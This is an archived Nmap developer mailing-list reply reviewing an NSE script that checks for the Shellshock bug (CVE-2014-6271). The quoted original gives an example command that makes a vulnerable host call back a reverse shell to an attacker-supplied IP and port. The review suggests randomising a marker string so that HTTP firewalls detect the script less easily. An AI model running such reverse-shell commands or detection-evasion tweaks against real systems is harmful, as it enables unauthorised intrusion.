Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Jacek Wielemborek <d33tah () gmail com>
Date: Fri, 26 Sep 2014 17:37:58 +0200
W dniu 26.09.2014 o 16:29, Paul AMAR pisze:
Hi list, I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271). I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso. This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments. Eg. ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d Feel free if you have any feedback, Paul _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Hello Paul, Nice, looks like you outran me! I was just announcing my version on IRC when it turned out that you already had yours :p I hope you won't mind a little code review: 1. This script does not contain correct NSEDoc - please take a look for example here for an example: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse 2. I would use shortport.http for the portrule, 3. We should keep in mind that HTTP firewalls will be looking for any fixed strings in the source. I would replace "NSERocks" with a random string to avoid getting detected so easily, 4. I was thinking that maybe letting the user specify the header to be used instead of User-Agent could make sense as well, 5. "Phone home" is really intrusive and I would suggest to make it run only if the user explicitly specifies that this is what she wants. Also, I would turn it into a separate function, Other than that, I really like this script! Now I guess that it's time for an SSH-based one. Cheers, Jacek Wielemborek
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Shell Shock NSE Script (CVE-2014-6271) Paul AMAR (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 28)
- <Possible follow-ups>
- Shell Shock NSE Script (CVE-2014-6271) Paul Amar (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Dean Pierce (Sep 29)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 26)